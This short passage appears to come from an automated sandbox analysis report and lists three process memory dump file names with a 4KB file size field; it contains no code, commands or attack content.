                                                                                                                                                                                      • memory/5908-437-0x0000000000000000-mapping.dmp
                                                                                                                                                                                      • memory/5996-444-0x0000000000000000-mapping.dmp
                                                                                                                                                                                      • memory/6116-454-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB